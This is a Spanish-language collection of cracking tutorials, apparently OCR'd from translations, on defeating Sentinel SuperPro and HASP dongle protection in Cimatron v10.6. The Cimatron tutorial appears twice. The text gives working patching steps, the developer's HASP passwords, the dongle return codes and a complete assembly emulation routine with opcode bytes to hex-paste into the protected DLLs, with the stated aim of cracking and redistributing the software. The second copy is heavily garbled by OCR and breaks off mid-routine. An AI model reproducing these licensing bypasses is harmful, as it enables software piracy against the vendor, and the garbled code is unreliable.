OK ,y todo el mundo contento. Good flag (Bandera indicando OK) aqui es 01, realmente esto es fácil. 


Conclusion 


Esta protección fué divertida, pero no lo suficientemente difícil como esperaba que sea. Sentinel SuperPro es una 
mochila decente pero deja demasiadas huellas, y esto nos permite reventarla sin problemas. Este programa no usa 
sproQuery() correctamente, y usa escasamente sproRead(), para hacer apenas 2 cosas , lo cual hace que sea 
sumamente fácil emularla. La clave para hacer ingeniería inversa con mochilas es rastrear y seguir el camino (path). Si 
no tenés los nervios para hacer esto, las mochilas no son para vos. Me gustan las mochilas, es divertido crackearlas, 
tené en cuenta esto y verás que es muy fácil reventarlas. 


Saludo a mis compinches: - zip, CrackZ, GzA, int13h. 


goatass. 


Traduccion por: Aftosa 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre Ingenieria Inversa y 
Programacion. Email "Colabora con tus Proyectos" 


Cmiatron v10.6 - tutorial por Crackz 
-Traducido por CORINTO, 17 de Mayo de 2001- 


<http://www.cimatron.com> - Webpage. 
<UCL's HASP Emulator> incluyendo código fuente. 


Este tutorial marca el final de mi actual serie sobre HASP, y no es recomen 

dada para iniciados porque voy a hablar sobre temas de ingeniería inversa 
bastante complicados. Un mensaje para cuando los desarrolladores de Cimatron 
lean esto, que yo se que lo harán :-), esta será la última versión de alguno de 

sus productos que voy a explicar cómo crackearla, dudo sin embargo que puedan 
conciliar el sueño fácilmente, porque será inevitable que alguien esté 

preparado para ocupar mi lugar, y distribuir libremente dicho software, 

bastante bueno por otra parte. 


Hemos visto en anteriores tutoriales sobre HASP como localizar fácilmente 

la rutina principal del HASP, el proceso de crackeo de los mismos era 

bastante simple, usar un editor HEX para localizar la cadena HASPDOSDRV' y 
cambiar el siguiente E(JMP) a ES(CALL), entonces parchear el "entry point" 

a este, varios FS más abajo del CALL[EBP+00] el cual está justo después de 

que CreateFileA llame a cualquiera de los dispositivos HASP. Obviamente todo 
lo que vuestra nueva rutina necesitaba era accionar el código de servicio en BH 
apropiadamente, y no voy a explicarlo otra vez, coged vuestro 'haspman.pdf' y hechad 
un vistazo a la sección ASM. Si realmente estais interesado en el crackeo de 
HASP entonces, codificar o convertir el generador de UCL HASP debería ser una 
prioridad, y si sois un poco vagos, podeis mandarme un e-mail y os enviaré un 
archivo de unos 600 bytes que es el que uso para emular todas las funciones 

de MemoHASP. 


Por supuesto HASP no puede hacerlo fácil y en la versión 6 se veía la manifestación de un 
'empacado', que es un encriptador PE, que tiene algunos trucos bastante buenos, confíando en un 
'dongle' para hacer la desencriptación. Esto normalmente toma la forma de una llamada de 
servicio 1 IsHasp(), seguido de un servicio 2 a HaspCode() dos veces, y decrementando el código 
origen. La respuesta a esto ya es conocida, todo lo que necesitáis es parchear los códigos de 
retorno precisos y volcar el programa desencriptado usando vuestro desencriptador favorito(muy 
recomendado el IceDump). 


La versión 7 sin embargo distingue un cambio significativo. Primeramente, HASP comenzó a darse 
cuenta de que ciertos inversores rusos estaban haciendo dinero vendiendo VXDs de HASP que eran 
activadas usando llaves de registro(ver el enlace al principio de este ejercicio a UCL). 

Ahora os voy a mostrar por primera vez como se hace esto. Los drivers para HASP Windows 
95/98 consisten en dos archivos, hasp95.vxd y hasp953dl.vxd, como debeis haber imaginado hasp95.vxd 
es el driver estático y hasp95dl.vxd es cargado dinámicamente(dl). 

Los rusos enfocaron sus ataques al driver dinámico: 


Control_0 
CMPEAX, 7 

JZ loc_C0000000 
CMPEAX, 9 

JZ loc_C0000002 
CMP EAX, 1Eh 
JZ loc_C000000D 
CMP EAX, 2 


JZ loc_C000001A 

CMP EAX, 23h <-- W32_DevicelOControl. 
JZ loc_C000009E 

CLC <-- Trace out service by clearing CF. 


El procedimiento Control realmente solo es una expresión switch(establece algo a si/no encendido 

o apagado), que probablemente habeis visto un millón de veces en C o lenguajes del estilo. Por 

supesto, HASP, como buen 'VXD' aprobado por Micro$oft, es llamado a través de un buen interfaz 
aprobado por Micro$soft: DevicelOControl. Cuando EAX=23 es el momento de realizar alguna acción. 

El contenido en ESTI es entonces la llave, especificamente el valor de [ESI+0C], cuando este es 2 

tenemos un servicio HASP en proceso, cuando [ESI+0C] es -1/0/1/3/4 son ejecutadas otras tareas, 
buscadlas vosotros mismos, cargando vuestro objetivo HASP, entrando en Softlce y tecleando 'vxd hasp95dl' y 
entonces estableciendo un bpmb en la dirección del control del procedimiento. Todos los 

'de-HASPers', lo que hacen es reescribir esta rutina de transferencia, para ello desencriptan los 

parametros del HASP(los cuales en este nivel están basados en XOR CON AAh y en ROR con 4), para 
accionar el servicio, esto es, retornando las respuestas que esperan dichos parametros, y 

ejecutando un VMMCall_RegOpenKey y un _RegQueryValueEx si es necesario y ¡¡voila!!, reencriptamos 
el servicio y lo traceamos(trace out). Yo hice exactamente lo mismo usando la v3.81 de 

los drivers del HASP en alrededor de una hora, y ahora tengo una bonita selección de software 

"operativo". La mayoría de los colegas rusos también almacenaron varios 'dongles' simulados del 
hasp95dl.vxd. 


Por supuesto HASP se enteró de esto y primeramente lo contrarrestó publicando continuamente drivers 
actualizados, esto significaba claro está que los de-HASPers debían ser también continuamente 
actualizados. La gente de HASP se dio cuenta que esto no podía continuar así indefinidamente, y 
cambiaron sus tácticas, y esto marca el punto donde la versión 7 entra en escena. Ahora podeis 
empezar con cualquiera de los programas de Cimatron para este tutorial(mejor RiSE), muchos de los 
programas principales son solo 'loaders' de las correpondientes DLLs. Yo elegí chkddf.exe/chkddf.dll 
porque en comparación son pequeños para desensamblarlos(hay otros 31 archivos que trabajan 
exactamente como este). 


Lo primero que hice fue poner un bpx en CreateFileA a este driver, pero sin esperar que funcionara 
entonces probé un montón de breakpoints(incluyendo DevicelOControl), el único que funcionó fue 
MessageBoxa, y a partir de ahí podeis tracear hacia atrás, pero dejadme probar algo primero. 

En primer lugar un bpmb al procedimiento de control de hasp95dl.vxd y entonces ejecutar chkddf.exe 
, ho salta, ¿por qué?, bien, el cuerpo de la nueva versión desencripta la auténtica rutina de 
comunicación el mismo, por eso los emuladores de sustitución a bajo nivel del vxd están acabados. 


1C003CFC CALL 1C003C40 <-- Aquí. 

1C003D01 TEST EAX, EAX 

1C003D03 MOV DWORD PTR [1C0327F8], EAX 

1C003D08 JZ 1C003D1F 

1C003D1F PUSH 1C030054 <-- "Protection Device Not Found".-->Dispositivo de protección no encontrado 


CALL 1C003CFC -->es donde encontrarás tu primera parada. Tuve Una pequeña intuición con la 'StringRef quizás :- 


1C003D40 SUB ESP, 100 <--hace algo de sitio en la pila 
1C003D46 PUSH ESI 

1C003D47 PUSH EDI 

1C003D48 XOR ESI, ESI <-- Borra ESI. 

1C003D4A CALL 1C008D60 <-- Aquí dentro debe haber algo. 
1C003D4F TEST EAX, EAX 

1C003D531 JZ 1C003D65 


1C003D53 PUSH 1C03007C <-- "Your version of the HASP driver is too old". 
("tu versión del controlador HASP es demasiado antigua") 


Date cuenta que nuestro problema era que no podíamos encontrar dónde la protección abría comunica 
ciones entre el HASP y el programa, una pequeña intuición os dice que debe haber algo debajo de 
CALL 1C008D60, sino cómo podría determinar que la versión es demasiado antigua. 


1C008D60 PUSH 1C033DDO 

1C008D65 PUSH 1C033DCC 

1C008D6A PUSH 1C033DC8 

1C008D6F PUSH 1C033DC4 <-- Estas serán por supuesto las direcciones de retorno para los parámetros. 
1C008D74 PUSH 0 

1C008D76 PUSH 0 

1C008D78 PUSH 0 

1C008D7A PUSH 0 

1C008D7C PUSH 1 <-- Servicio. 

1C008D7E CALL 1C01E000 <-- ¡Este es el comienzo de la seccion .data!. 
1C008D83 MOV ECX, DWORD PTR [1C033DCC] 

1C008D89 XOR EAX, EAX <-- Borra EAX. 

1C008D8B ADD ESP, 24 <-- Limpia la pila. 

1C008D8E CMP ECX, FEFFFE99 <-- -103. 

1C008D91 SETE AL <-- Flag AL. 

1C008D94 RET 


Ahora estamos consiguiendo algo, se pasan un montón de parámetros a CALL 1C01E000, que es 
realmente el comienzo de la sección .data, ¡y sin desensamblar con w32Dasm!. Aquí es donde está 
el meollo. Vamos a poner un breakpoint en este punto(1c01e000), y ver como prosigue el código. 
Bien, no voy a decíroslo todo, pero si os diré que tracear este código es como nadar en petróleo, 
parte del código es realmente demencial :-), en las primeras fracciones del mismo deberíais 
distinguir entre 'ruido' y código 'real', hay un montón de mierda, algo así como dos de cada tres 
instrucciones no hacen nada, observa el siguiente código:- 


:1C01E006 PUSHAD <-- Salva todos los registros. 
:1C01E007 ADD AL,00  <-- Basura. 

:1C01E009 XCHG ESIESI <-- Basura. 
:1CO1E00B MOV AH,AH  <-- Basura. 
:1C01E00D CALL 1C0298D2 <-- CALL real. 


:1C0298D4 MOV EDX,[ESP] <-- Real. 

:1C0298D7 JA 1C0298D9 <-- Basura. 

:1C0298D9 SUB ESP,-04 <-- Real. 

:1C0298DC SHLD EBX,ECX,80 <-- Basura. 
:1C0298E0 MOV EBP,ESP <-- Real. 

:1C0298E2 XCHG BH,BH <-- BAsura. 

:1C0298E4 ADD EBP,FEFFFFF4 <-- establece EBP. 
:1C0298EA LEA EDI [EDI] <-- BAsura. 
:1C0298EC MOV EBX,1F8DFE10 <-- Basura. 
:1C0298F1 XCHG BH,BH <-- Basura. 


¿Por qué os enseño esto?, bueno, este nuevo objeto encriptado está muy bien codificado para 
oscurecer el código y su traceo, y aquí es donde entra el buen hacer del cracker, yo vi un 
montón de código que parecía notablemente familiar al de la versión 6 pero no trabaja como 


yo esperaba, por ejemplo:- 


:0072F067 PUSH 0072B6C6 

:0072F06C CALL 00729D68 <-- haspreg()-->Fucnión de registro de HASP. 
:0072F071 MOV EDI, [ESP+3C] 

:0072F075 MOV [EDI],EAX <-- Retorna parte 1. 
:0072F077 MOV EDI, [ESP+40] 

:0072F07B MOV [EDI],EBX <-- Retorna parte 2. 
:0072F07D MOV EDI [ESP+44] 

:0072F081 MOV [EDI],ECX <-- Retorna parte 3. 
:0072F083 MOV EDI, [ESP+48] 

:0072F087 MOV [EDI],EDX <-- Retorna parte 4. 
:0072F089 ADD ESP,04 <-- Corrige la pila. 
:0072FO8SC POPAD <-- Restaura los registros. 


Con estos apuntes de aquí arriba, os habreis dado cuenta de lo obvio, no es necesario estudiar 

la desencriptación porque nuestros códigos de retorno son verificados fuera de la aplicación 

(todos los parámetros son colocados en la pila del objeto encriptado listos para ser accionados 
(iniciar la comunicación)). Pero más tarde veremos cómo esto podría haber causado problemas si no 
fuera por la sobrecarga(overload) de la principal DLL (cimit.DLL) de la protección de Cimatron. 
Por lo tanto todo lo que tenemos que hacer es insertar nuestra rutina de emulación al comienzo 

de la sección .data y accionar el servicio, por el trozo anterior de código sabemos que las 
direcciones de retorno son colocadas en la protección :-) 


Voy a publicar aquí mi rutina completa de emulación, tal cual es, puede ser pegada en los otros 

31 archivos protegidos con vuestro editor hexadecimal(con el tiempo se encontrará la forma de hacerlo 
dentro de cimit.DLL, pero todavía no). El perspicaz que hay dentro de vosotros os habra avisado de un 
problema rápidamente. Cuando se llama al servicio 2 el único parámetro que se le pasa es el 

código origén(64) y no las passwords del desarrollador, por lo tanto estamos ante un objetivo 
absolutamente desconocido y tendríamos un problema, afortunadamente yo sabía que eran 2209/713D 
desde la versión 10, de hecho podríamos haberlas descubierto en cimit.DLL también. Por lo tanto 

los de Cimatron si estais leyendo esto , tomad nota de estos dos errores. 


1) Estais usando apenas un código origen(64) y vuestras passwords son conocidas. 
2) Al haber usado la versión 6 para proteger cimit.DLL, es fácil recuperar vuestras passwords. 


Obviamente podemos parchear los códigos correctos de retorno sin preocuparnos. 


PUSHAD (60) <-- Salva todos los registros. 

CALL $+5 (E8 00 00 00 00) <-- nuestro emulador. 

POP EBP (5D) <-- consigue la dirección actual. 

XOR EAX, EAX (33 CO) <-- borra EAX. 

MOV EAX, [ESP+24] (8B 44 24 24) <-- Servicio. 

CMP AX, 1 (66 3D 01 00) <-- comprobación IsHaspO (comprueba la presencia de HASP. 
JNE $+8 (75 08) <-- Chequea el próximo servicio. 

MOV EDI, [ESP+38] (8B 7C 24 38) <-- Dirección de retorno de Parte 1. 
MOV [EDI], EAX (89 07) <-- HASP encontrado. 

POPAD (61) <-- Restaura todos los registros. 

RET (C3) <-- // IsHaspó. 

CMP AX, 2h (66 3D 02 00) <-- comprobación HaspCode(). 


JNE $+2A (75 2A) <-- Chequea el próximo servicio. 
MOV AX, 3FA1 (66 B8 A1 3F) <-- Código retorno 1. 
MOV EDI, [ESP+38] (8B 7C 24 38) 

MOV [EDI], EAX (89 07) 

MOV AX, FF26 (66 B8 26 FF) <-- Código retorno 2. 
MOV EDI, [ESP+3C] (8B 7C 24 3C) 

MOV [EDI], EAX (89 07) 

MOV AX, 5EE7 (66 B8 E7 5E) <-- Código retorno 3. 
MOV EDI, [ESP+40] (8B 7C 24 40) 

MOV [EDI], EAX (89 07) 

MOV AX, 4955 (66 B8 55 49) <-- Código retorno 4. 
MOV EDI, [ESP+44] (8B 7C 24 44) 

MOV [EDI], EAX (89 07) 

POPAD (61) 

RET (C3) <-- // HaspCode(). 

CMP AX, 4Bh (66 3D 4B 00) 

JNE $+2D (75 2D) <-- Finge siempre el retorno correcto. 
MOV EDI, [ESP+38] (8B 7C 24 38) <-- Consigue dirección de lectura. 
MOV EAX, [EDI] (8B 07) <-- mueve a EAX. 

LEA EDI, [EBP+68] (8D 7D 68) <-- comienzo de la memoria emulada (16 bytes). 
ADD EDI, EAX (03 F8) <-- Suma la dirección a leer. 
MOV AL, BYTE PTR [EDI] (8A 07) <-- la coloca en AL. 
MOV EDIL, [ESP+3C] (8B 7C 24 3C) <-- Código retorno 2. 
MOV [EDI], EAX (89 07) 

XOR EAX, EAX (33 CO) <-- Borra EAX. 

MOV EDI, [ESP+40] (8B 7C 24 40) <-- Código retorno 3. 
MOV [EDI], EAX (89 07) 

POPAD (61) 

RET (C3) // ReadByte(). 

db 16 (memoria emulada). 

XOR EAX, EAX (33 CO) <-- Borra EAX. 

MOV EDI, [ESP+38] (8B 7C 24 38). 

MOV [EDI], EAX (89 07). 

MOV EDI, [ESP+3C] (8B 7C 24 3C). 

MOV [EDI], EAX (89 07). 

MOV EDI, [ESP+40] (8B 7C 24 40). 

MOV [EDI], EAX (89 07). 

MOV EDI, [ESP+44] (8B 7C 24 44). 

MOV [EDI], EAX (89 07). 

POPAD (61). 

RET (C3). 


Fijaos que aquí emulo solo 3 servicios(1, 2 y 4B), si examinais de cerca el código vereis que se 

hace referencia a muchos otros servicios(4, 32, 46, 48, 49 y 4a), pero el código nunca puede ser 

alcanzado, por supuesto con un programa como Cimatron y otras 31 DLLs para desproteger, puedes 

calcular el tiempo que llevaría desensamblar cada DLL y también emular esos servicios sin 

referenciar, y es inaceptable. Con el servicio 4B se leen 2 bytes, las direcciones C y D, 

y se les hace un XOR con 8000h y debe ser igual al ID de tu dongle, esto es, si el ID de un 

dongle es 0614 este requiere 8614 => word C=14 y word D=86. Arrancad vuestro recién parcheado chkddf.exe, 
y bien, como ya sabes, funciona :-) 


La principal DLL de Cimatron es cimit.DLL, esta ejecuta el programa principal y es además su 


protección. En vez de aplicar sólo la versión 7, Cimatron ha aplicado también la versión 6. 

En lugar de darte todo el crack 'mascado', solo te describiré como lo hice, y te dejo la implementación a 

ti. Primero hay que localizar la versión 6, puedes hacerlo con el habitual bpx en FreeEnvironmentStringsA, 
el programa también chequea que está el dongle Cimagrafi y comprueba estos passwords :-), yo 

aquí elegí hacer alguna redirección, puedes encontrar fácilmente el salto JMP HASPDOSDRV y 
redireccionar el JMP al CALL a tu propia rutina -esto significa que debes encontrar donde se 

desencripte el código para este salto JMP(fácil con bpr). 


Sin embargo la versión 7 es desencriptada por la v. 6, lo que significa que no puedes simplemente 
pegar tu rutina de emulación al comienzo de la sección .data, tienes que encontrar donde se 
desencripta(bpr otra vez). - Te aviso que esto pondrá a prueba tu paciencia en cuanto que hay un 
montón de instrucciones de copia 'de' y 'a' con las que haberselas. No creía que fuera práctico 
trabajarse todos los byte desencriptados que se requieren para generar mi rutina de emulación 
completa(que para cimit.DLL alcanza los 672 bytes), así que solo desencripté un "long JMP' a otra 
rutina que coloqué en el espacio libre al final de .reloc, recuerda que realmente no nos importa 
cómo leches se desencripta la versión 7, no vamos a hacer nunca una llamada a ese lugar. En la 
versión distribuida de este crack tuve que emular el servicio 3, e hice un trabajo bastante torpe 

al modificar las características de la cabecera PE, por eso pude escribir un salto JMP sobre uno 
JNZ(no muy agradable estéticamente). 


Para aquellos de vosotros que uséis la opción RE_ENGE, necesitaréis un número de registro para 
poder salvarlo correctamente. Mi buen amigo prs parcheó la DLL para vosotros, sin embargo yo 
anduve la milla extra y forcé que aceptara 00061E21 como un código válido. 


Esto es todo, no hay aquí disponible ningún crack para perdedores, id y haced algo de trabajo 
vosotros mismos :-) Si alguien de Cimatron se toma la molestia de mandarme un correo electrónico 
quizás tengamos una conversación civilizada. 


S£COPY; 1999CrackZ, 18 de Diciembre de 1999. 


Como seguro que esta traducción tendrá errores y puntos que no han quedado claros, 
mándame tus dudas a : 
elcorinto E hotmail.com 


CORINTO. Piensa, y que no te cojan !!!. 


Cimatron v10.6 - Tutorial por CrackZ 


http://www.cimatron.com - Pagina Web. 


Obtenga el release de RiSE del 26/11/99. 
Emulador HASP de UCL incluyendo los codigos fuente. 


Este tutorial marca el fin de mi actual serie sobre HASP y no esta recomendado para principiantes, tal como lo he discutido en 
muchos "reversings" bastante pesados. Un mensaje a los diseñadores de Cimatron sí por casualidad leyeran esto, como se que 
lo hacen:-), esta sera la ultima version de sus productos que mostrare como crackear, no obstante dudo que puedan ustedes 
dormir facilmente sin embargo, como que inevitablemente algun otro esta preparado para tomar mi lugar y distribuir su 
bastante buen software libremente. 


Hemos visto en tutoriales HASP anteriores como localizar facilmente la rutina principal HASP, El proceso de crackear la 
mayoria de estos era bastante simple, use su editor HEX para localizar la cadena HASPDOSDRV y cambie el proximo E9 
(IMP) por ES (CALL), luego emparche el punto de entrada a esto, varios FS's debajo de CALL [EBP+00] como ocurre muy 
cerca despues de una llamada CreateFileA a cualquiera de los dispositivos HASP. Obviamente todo lo que sus nuevas rutinas 
necesitaban era el codigo de servicio apropiado en BH, no describire esto nuevamente, alcance su haspman.pdf y eche una 
mirada a la seccion sobre ASM. Si usted es serio sobre el crakeo de HASP entoces codificar o convertir el generador HASP de 
UCL en ASM debe ser una prioridad, si es perezoso envieme un e-mail y yo le enviare un archivo de aproximadamente 600 
bytes que utilizo para emular todas las funciones MemoHASP. 


Por supuesto HASP no podia hacer esto facil y la version 6 vio la manifestacion de la 'cubierta' (envelope) que es un 
encriptador de PE que tiene algunos trucos bastante buenos, confiando en el dongle para hacer el desencriptado. Esto 
usualmente toma la forma de una llamada IsHasp() (service 1), luego HaspCodeO (service 2) dos veces, luego decrementan el 
codigo "seed". Con respuestas conocidas todo lo que se necesitaba era emparchar los codigos requeridos como retorno y volcar 
el programa desencriptado con su "dumper" favorito (necesariamente recomiendo el IceDump). 


La version 7 de la cubierta sin embargo muestra un marcado cambio. Principalmente, HASP comenzo a darse cuenta que 
ciertos "reversers” rusos estaban ganado dinero vendiendo vxd's HASP que eran activadas usando llaves de registro (vea el link 
de UCL al comienzo de este ensayo). Yo les mostrare ahora por primera vez como se hace esto. Los drivers HASP para 
Windows 95/98 consisten en 2 archivos, hasp95.vxd $ hasp95dl.vxd, como usted ya podria haber supuesto hasp95.vxd es el 
driver estatico y hasp95dl.vxd esta dinamicamente cargado (dl). Es en el drive dinamico donde los rusos enfocaron su ataque:-( 


Control_0 

MP EAX, 7 

Z loc_C0000000 

MP EAX, 9 

Z loc_C0000002 

MP EAX, 1Eh 

Z loc_C000000D 

MP EAX, 2 

Z loc_CO00001A 

MP EAX, 23h <-- W32_DevicelOControl. 
JZ loc_C000009E 

CLC <-- Sale del servicio limpiando CF. 


QO4S4Q0GQa 


aq 


aq 


El procedimiento Control realmente no es nada mas que un "switch statement", usted probablemente ha visto la misma cosa un 
millon de veces en C o lenguajes del mismo tipo. Por supuesto, HASP posee buenas vxd con ID de usuario, aprobadas por 
Microsoft tambien llamadas via DevicelOControl, la interfase aprobada por Microsoft. Cuando EAX=23 es tiempo para alguna 
accion. La estructura en ESI es entonces la llave, especificamente el valor de [ESI+0C]. Cuando este es 2 tenemos un servicio 
de HASP en accion, Cuando [ESI+0C] es -1/0/1/3/4 otros trabajos son realizados, veanlo por si mismos cargando su blanco de 
HASP, ingresando en SoftICE y tipeando 'vxd hasp95dl' y luego posicionando un bpmb en la direccion del procedimiento de 


control. Todo lo que los "de-HASPers" hacen es re-escribir esta rutina de "dispatch", haciendo que desencripte los parametros 
del HASP (que a este nivel es XOR con AAh y ROR 4 veces), accionar el servicio es decir devolver las respuestas que quieren, 
realizar una VMMCall _RegOpenKey y RegQueryValueEx si fuera necesario y voila, re-encriptar los parametros y salir del 
servicio. Yo hice exactamente lo mismo usando los drivers v3.81 de HASP en alrededor de una hora y ahora tengo una fina 
seleccion de software que funciona. Muchos de los tipos rusos tambien guardan varios dongles simulados en hasp93dl.vxd. 


HASP por supuesto cayo en la cuenta de esto y primero contra-ataco mediante la emision continua de drivers actualizados, esto 
por supuesto significo que los "de-HASPers" debian ponerse al dia permanentemente. Realmente esto no podia continuar 
indefinidamente y la gente de HASP cambio de tacticas y esto marca el punto donde la cubierta v7 despega. Ahora, usted 
puede comenzar con cualquiera de los programas Cimatron para este tutorial (conseguir el release de RiSE es probablemente la 
forma de hacerlo), muchos de los programas principales son solamente cargadores para las correspondientes DLL's. Yo elegi 
chkddf.exe/chkddf.DLL debido a que era comparativamente pequeña para desensamblarla (otros 31 archivos trabajaran 
exactamente igual que este). 


La primera cosa que hice, un bpx en CreateFileA para ese driver, pero sin esperanzas, luego probe muchos otros breakpoints 
(incluso DevicelOControl), el unico que pude conseguir que trabajara es MessageBoxA, usted puede rastrearlo ahora, pero 
dejeme hacer algo antes. Primero ponga un bpmb en el control de procedimientos de hasp95dl.vxd y corra chkddf.exe, no se 
dispara, por que?, bien la nueva cubierta ahora desencripta la propia rutina real de comunicaciones entonces los emuladores 
vxd por reemplazos de bajo nivel han terminado. 


1C003CFC CALL 1C003C40 <-- Aqui. 

1C003D01 TEST EAX, EAX 

1C003D03 MOV DWORD PTR [1C0327F8], EAX 

1C003D08 JZ 1C003D1F 

1C003D1F PUSH 1C030054 <-- "Protection Device Not Found". 


CALL 1C003CFC es aqui donde usted llegara con su primer break. Una pequeña intuicion de StringRef quizas :-) 


1C003D40 SUB ESP, 100 <-—-Hace algun espacio en el stack. 

1C003D46 PUSH ESI 

1C003D47 PUSH EDI 

1C003D48 XOR ESI, ESI <-- ESI=0. 

1C003D4A CALL 1C008D60 <--— Puede haber mas debajo de esto. 

1C003D4F TEST EAX, EAX 

1C003D51 JZ 1C003D65 

1C003D53 PUSH 1C03007C <-- "Your version of the HASP driver is too old". 


Comprenda que nuestro problema era que no pudieramos encontrar donde la cubierta abrio las comunicaciones entre el HASP 
y el programa, una pequeña intuicion le dice que debe haber sido dentro de CALL 1C008D60 sino como puede determinar que 
la version es demasiado antigua. 


1C008D60 
1C008D65 
1C008D6A 
1C008D6F 


1C008D74 
1C008D76 
1C008D78 
1C008D7A 
1C008D7C 
1C008D7E 
1C008D83 


devolucion 


PUSH 
PUSH 
PUSH 


1C033DD0 

1C033DCC 

1C033DC8 

PUSH 1C033DC4 <-- Esto por supuesto debe ser la direccion de retorno para la 
de parametros. 

PUSH 0 

PUSH 0 

PUSH 0 

PUSH 0 

PUSH 1 <-- Servicio. 

CALL 1C01E000 <-- Este es el inicio del la seccion 
MOV ECX, DWORD PTR [1C033DCC] 


.data!. 


1C008D89 XOR EAX, EAX <-—- EAX=0. 


1C008D8B ADD ESP, 24 <-- Puliendo el 
1C008D8E CMP ECX, FFFFFF99 <-- -103. 
1C008D91 SETE AL <-- Flag AL. 
1C008D94 RET 


stack. 


¡Ahora estamos llegando a alguna parte, montones de parametros puestos dentro (pushing) de CALL 1C01E000 que realmente 
es el inicio de la seccion .data! y no desensamblada para nada por W32Dasm. Esto es lo que debe estar pasando. Prepare un 
breakpoint al registro de debug para esto y veamos como procede el codigo. Bien, yo no voy a decirle todo, pero lo que si le 
dire en este trazado es como nadar a traves de la masa viscosa, mucho de este codigo es verdaderamente loco:-), en principio 
usted debe tratar de distinguir entre el ruido y la intencion real del codigo, hay un monton de basura, algo asi como 2 o 3 
instrucciones que no hacen nada, considere lo siguiente:-( 


todos los registros. 


:1C01£E006 PUSHAD <-- Salve 

:1C01E007 ADD AL,00 <-—= Basura. 
:1C01E009 XCHG ESI,ESI  <-- Basura. 
:1C01E00B MOV AH,AH <-—= Basura. 
:1C01E00D CALL 1C0298D2 <--— CALL real. 
:1C0298D4 MOV EDX, [ESP] <-—- Real. 
:1C0298D7 JA 1C0298D9 <-— Basura. 
:1C0298D9 SUB ESP,-04 < 


:1C0298DC 
:1C0298E0 
:1C0298E2 


SHLD EBX,ECX, 80 
MOV EBP,ESP  <--— 


XCHG BH,BH <-- Basura. 


Preparado para la funcion. 
<-- Basura. 
Preparado para la funcion. 


:1C0298E4 ADD EBP,FFFFFEFF4 <-- Prepara EBP. 
:1C0298EA LEA EDI, [EDI] <--= Basura. 
:1C0298EC MOV EBX,1F8DFE10 <-- Basura. 


:1C0298F1 XCHG BH,BH <-- Basura. 


Por que estoy mostrandole esto?, bien, este nuevo objeto encriptado esta seriamente bien codificado para obscurecer el 
debugging y hay mucho [there is a lot of leading of the cracker], vi montones de codigo que parecia notablemente familiar en 
la version 6 de la cubierta solo que no trabajaba como esperaba, e.g. :-( 


:0072F067 PUSH 0072B6C6 

:0072F06C CALL 00729D68 <-—- haspreg(). 
:0072F071 MOV EDI, [ESP+3C] 

:0072F075 MOV [EDI],EAX <-—- Retorna Parl. 
:0072F077 MOV EDI, [ESP+40] 

:0072F07B MOV [EDI],EBX <-— Retorna Par2. 
:0072F07D MOV EDI, [ESP+44] 

:0072F081l MOV [EDI],ECX <-- Retorna Par3. 
:0072F083 MOV EDI, [ESP+48] 

:0072F087 MOV [EDI],EDX <-— Retorna Par. 
:0072F089 ADD ESP,04 <-- Corrige el stack. 
:0072F08C POPAD <-—- Restaura los registros. 


Dejando estas notas de lado usted por supuesto ya habra comprendido lo obvio. Esto es que simplemente no hay ninguna 
necesidad de estudiar la desencripcion debido a que nuestros codigos de retorno estan todos del lado de la aplicacion verificada 
(todos los parametros estan puestos dentro del stack del objeto encriptado listo para ser accionado). Aun veremos luego como 
esto hubiese causado problemas pero no lo eran para la sobrecarga de proteccion en el DLL principal (cimit.DLL). Todo lo que 
nosostros necesitamos hacer es insertar nuestra rutina de emulacion en el inicio de la seccion .data y accionar el servicio, 
nosotros sabemos desde los primeros "snippets" que las direcciones de retorno tambien son colocadas (pushed) en la cubierta :- 


Yo voy a apublicar aqui mi rutina completa de emulacion "tal como esta", esta puede ser pegada con su editor HEXadecimal en 
los otros 31 archivos protegidos (eventualmente tambien encontrara su camino dentro de cimit.DLL pero no todavia). Por 
supuesto los astutos entre ustedes habran notado rapidamente un problema. Cuando el servcio 2 es llamado el unico parametro 
pasado a traves del stack es el codigo "seed" (64) y no los passwords del desarrollo, por consiguiente siendo este un blanco 
totalmente desconocido podriamos tener un problema, afortunadamente yo supe que para la version 10 eran 2209/713D, de 
hecho podriamos haberlos descubierto para cimit.DLL tambien como usted a visto. Por lo tanto Cimatron, si usted esta leyendo 
esto, tome nota de estos 2 errores. 


1) usted esta usando el codigo "seed" (64) solo una vez y sus passwords son conocidos. 
11) recuperar sus password hubiese sido tan facil como usando la version 6 de la cubierta para proteger cimit.DLL. 


Obviamente podemos emparchar en los codigos de retorno correctos y no esmerarnos realmente. 


PUSHAD (60) <-— Salva todos los registros. 

CALL $+5 (E8 00 00 00 00) <-- Nuestro emulador. 

POP EBP (5D) <-- Obtiene la direccion actual. 

XOR EAX, EAX (33 C0) <-—- EAX=0. 

MOV EAX, [ESP+24] (8B 44 24 24) <-- Servicio. 

CMP AX, 1 (66 3D 01 00) <-- Es el IsHasp(). 

JNE $+8 (75 08) <-- Chequee el proximo servicio. 

MOV EDI, [ESP+38] (8B 7C 24 38) <-- direccion de retorno de Parl. 
MOV [EDI], EAX (89 07) <-—- HASP encontrado. 

POPAD (61) <--— Restaura todos los registros. 

RET (C3) <-- // IsHasp(). 

CMP AX, 2h (66 3D 02 00) <--— Es el HaspCodel(). 

JNE $+2A (75 2A) <-- Chequee el proximo servicio. 

MOV AX, 3FA1 (66 B8 Al 3F) <-- Codigo de retorno 1. 

MOV EDI, [ESP+38] (8B 7C 24 38) 

MOV [EDI], EAX (89 07) 

MOV AX, FF26 (66 B8 26 FF) <-- Codigo de retorno 2. 

MOV EDI, [ESP+3C] (8B 7C 24 3C) 

MOV [EDI], EAX (89 07) 

MOV AX, 5EE7 (66 B8 E7 5E) <-- Codigo de retorno 3. 

MOV EDI, [ESP+40] (8B 7C 24 40) 

MOV [EDI], EAX (89 07) 

MOV AX, 4955 (66 B8 55 49) <-- Codigo de retorno 4. 

MOV EDI, [ESP+44] (8B 7C 24 44) 

MOV [EDI], EAX (89 07) 

POPAD (61) 

RET (C3) <-- // HaspCode(). 

CMP AX, 4Bh (66 3D 4B 00) 

JNE $+2D (75 2D) <-- Siempre un falso retorno exitoso. 
MOV EDI, [ESP+38] (8B 7C 24 38) <-- Obtiene la direccion leida. 
MOV EAX, [EDI] (8B 07) <-— En EAX. 

LEA EDI, [EBP+68] (8D 7D 68) <-- Inicio de la memoria emulada (16 bytes). 
ADD EDI, EAX (03 F8) <--— Suma la direccion a leer. 

MOV AL, BYTE PTR [EDI] (8A 07) <-- Colocado en AL. 

MOV EDI, [ESP+3C] (8B 7C 24 3C) <-- Codigo de retorno 2. 
